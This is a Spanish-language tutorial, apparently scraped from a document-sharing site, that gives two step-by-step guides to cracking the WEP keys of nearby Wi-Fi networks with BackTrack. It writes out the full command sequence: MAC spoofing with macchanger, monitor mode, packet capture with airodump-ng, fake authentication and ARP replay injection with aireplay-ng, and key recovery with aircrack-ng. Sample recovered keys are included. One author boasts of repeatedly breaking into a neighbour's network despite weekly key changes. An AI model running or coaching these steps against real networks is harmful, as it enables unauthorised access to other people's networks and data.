Sei sulla pagina 1di 9

ya que lo descargaron lo queman como imagen de cd en un CD-R ya quemado lo meten en la pc y la reinician para botear con el cd (normalmente se hace presionando

F12 luego de que prendes tu pc) ya booteando, lo dejas que carge NO LE APRIETES NADA HASTA QUE TE APARESCA ESTA PANTALLA:

ya estando ahi abres una consola o shell:

Y AHORA EMPIEZA EL VERDADERO TUTORIAL:

Tecleas iwconfig para observar con que nombre esta marcada tu targeta wireless que llamare [tu tarjeta]

En el caso de la imagen es ath0 pero puede ser cualquier otro Ahora tecleamos los siguiente en orden: airmon-ng stop [tu tarjeta] ifconfig [tu tarjeta] down macchanger --mac 00:11:22:33:44:55 [tu tarjeta] airmon-ng start [tu tarjeta] y por ultimo airodump-ng [tu tarjeta] en el caso de la imagen queda - airmon-ng stop ath0 - ifconfig ath0 down - macchanger --mac 00:11:22:33:44:55 ath0 - airmon-ng start ath0 - airodump-ng ath0 al teclear el ultimo te aparece una lista de los modem cercanos a los que puedes acceder

luego de que se llene la lista resionas CONTROL+C y anotas el Canal o CH y el nombre del modem o BSSID

En el caso de la imagen queda BSSID = 00:24:56:A2: FD:01 CH (CANAL) = 11 Ahora escribes airodump-ng -c AQUI EL CANAL -w wep --bssid AQUI PONES LA BSSID DE EL MODEM QUE ELEGISTE [tu tarjeta] a mi me quedaria asi: airodump-ng -c 11 -w wep --bssid 00:24:56:A2: FD:01 ath0 Despues Abrimos otra SHELL y tecleamos: aireplay-ng -1 0 -a TU BSSID -h 00:11:22:33:44:55 [tu tarjeta] Ami me quedaria asi: aireplay-ng -1 0 -a 00:24:56:A2: FD:01 -h 00:11:22:33:44:55 ath0 Luego aireplay-ng -3 -b TU BSSID -h 00:11:22:33:44:55 [tu tarjeta] a mi me queda: aireplay-ng -3 -b 00:24:56:A2: FD:01 -h 00:11:22:33:44:55 ath0 Abres una consola nueva (shell) y tecleas el siguiente comando. aircrack-ng -b TU BSSID wep-01.cap Ami me quedaria asi: aircrack-ng -b 00:24:56:A2: FD:01 wep-01.cap ESPERAMOS UNOS SEGUNDOS.... Y TENDREMOS LO QUE QUERIAMOS! EL KEY

MI CLAVE QUEDARIA NUESTRA CLAVE QUEDARIA: 2022912530 mas informacin: http://www.aircrack-ng.org/doku.php?id=wesside-ng ESPERO QUE LES SIRVA SALUDOS =) COMENTEN CUALQUIER DUDA QUE TENGAN

Primero que todo al momento de insertar y bootear el dvd, aparece la primera pantalla con distintas opciones, elijen la primera opcin, luego empieza a cargar los distintos archivos para que pueda funcionar backtrack y te pide nombre de usuario y pass, Login: root Pass: toor Y para comenzar escriben startx (obviamente sin comillas) Ahora a usar el backtrack, es muy parecido a la versin anterior, pero pude ver que varios tuvieron problemas con colocar la tarjeta en modo monitor al no poder ejecutar el KISMET, por lo que empezare por ese punto, mediante una ventana

Como vemos al abrir una ventana escribimos lo siguiente: Airmon-ng stop wlan0 con esto vemos las interfaces que tenemos en la pc, en mi caso me muestra wifi0 y ath0, para ver la interface que tenemos la podemos ver en otra ventana escribiendo iwconfig Entonces ahora activamos la interface, en mi caso va a ser wifi0 y no ath0, esto por que estoy usando los drivers madwifi-ng Para activar la interface escribimos en la misma ventana airmon-ng start wifi0

Como vemos ya esta activada como en modo monitor, sin necesidad de activar el kismet, adems con el iwconfig puedo ver cual es mi mac. Ahora empezamos a escanear las redes que tenemos en nuestro alcance, para esto usaremos el comando airodump-ng Escribimos airodump-ng ath0 con lo cual nos va a mostrar las seales que tenemos, en mi caso se ve de esta manera

Para ver cuales seales nos sirven, hay que ver la columna #/s, esa columna nos indica la cantidad de datos que la seal esta emitiendo, en este caso vamos a utilizar la primera seal que aparece en la imagen (HREYGA). Ahora empezamos a escanear las redes que se encuentran en ese canal, en este caso canal 11

Para ello escribimos lo siguiente

Airodump-ng --channel 11 --write exploit ath0

Channel 11 es en donde se encuentra la seal que vamos a escanear Write exploit es el archivo que se va a crear para poder guardar los datos que se capturen Ath0 es la interface de la tarjeta

Despus de esto nos aparece lo siguiente

Lo que hacemos ahora es empezar a capturar los datos de esta seal, para lo cual escribimos en otra ventana

Aireplay-ng -3 -b 00:1D:60:37:0B:52 -h (tu mac) ath0

Despues de dar enter en esta pantalla el backtrack empieza a capturar los paquetes necesarios, les debera aparecer una imagen parecida a esta

Si se fijan recin llevo como 2100 ARP, cuando el valor de esta columna este por los 60.000 ya pueden obtener la clave de la red, el tiempo va a depender de la intensidad de la seal que tengan, el ultimo tiempo mi vecino me cambia la clave todas las semanas y tengo el 100% de su seal y lo menos que me demore fueron casi 3 minutos 20 segundo para obtener si clave

Cuando ya tengan suficientes ARP detienen la inyaccion de paquetes con control+c Ahora para crackear la wep escribimos

Aircrack-ng exploit-01.cap (imagen del tutorial de backtrack 3, pero es lo mismo)

Nos pedir que seleccionemos el numero de la red victima, en este caso la mia esta en el numero 1

Felicidades ya tenemos la clave wep de la red que hayamos seleccionado!!!

Key found 00:07:20:37:01, para conectarse obviamente la escriben sin colocar los : (0007203701) Errores comunes: cuando empec a aprender esto me topaba con varios errores jejeje por ejemplo pondr los mas comunes: 1)confundir los comandos airodump, aireplay, aircrack 2)escribir mal los comandos 3)olvidar poner -ng a los comandos: airodump-ng, aireplay-ng, aircrack-ng 4)poner incorrectamente el nombre de la red de la victima, asi como su mac o la mia existen mas comandos para crackear weps, estos no son los unicos pero eso ya depende de uds averiguarlos Espero que les haya gustado y que les sirva. Dependiendo de la calidad de la seal recibida va a depender el tiempo de craquear la wep.

Ahora para salir de backtrack 4, vamos a logout y nos enva a una pantalla como MS-DOS y escribimos poweroff, con lo cual apaga el pc, a diferencia de la versin anterior que se poda reiniciar el pc.

Eso es espero que les sirva

Potrebbero piacerti anche